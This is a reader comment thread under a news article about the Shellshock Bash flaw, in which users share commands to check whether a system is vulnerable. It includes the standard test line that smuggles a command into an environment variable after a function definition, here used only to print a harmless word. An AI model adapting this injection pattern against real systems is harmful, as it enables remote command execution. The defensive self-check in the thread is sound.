back to article Hackers thrash Bash Shellshock bug: World races to cover hole

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers. But as "millions" of servers, PCs and devices lay vulnerable or are being updated, it's emerged the fix is incomplete. The flaw affects …

Page:

1. Andy Non Silver badge

How to check?

I'm a Linux newbie, having switched from Windows to Kubuntu very recently. How do I check if I have bash on this computer (as opposed to dash... or both). All I know is I can do stuff from the command line via Konsole but don't know how to check for bash or versions of it.

1. Destroy All Monsters Silver badge

Re: How to check?

Simples run this in your shell:

env x='() { :;}; echo OOPS' bash -c /bin/true

Check whether "/bin/bash" exists:

stat /bin/bash ; find / -name bash -type f

Detect version:

/bin/bash --version

1. Andy Non Silver badge

Thanks. :-)

env x='() { :;}; echo OOPS' bash -c /bin/true

Gave:

bash: warning: x: ignoring function definition attempt

bash: error importing function definition for `x'

Presumably that is good?

stat /bin/bash ; find / -name bash -type f

Gave:

File: ‘/bin/bash’

Size: 986672 Blocks: 1928 IO Block: 4096 regular file

e.t.c.

/bin/bash --version

Gave:

GNU bash, version 4.3.11(1)-release (i686-pc-linux-gnu)

Copyright (C) 2013 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Pint

Presumably that is good?

Yes, you are good.

GNU bash, version 4.3.11(1)-release (i686-pc-linux-gnu)

Further along than on Fedora 20, I just arrived at 4.2.47(1).

2. El Andy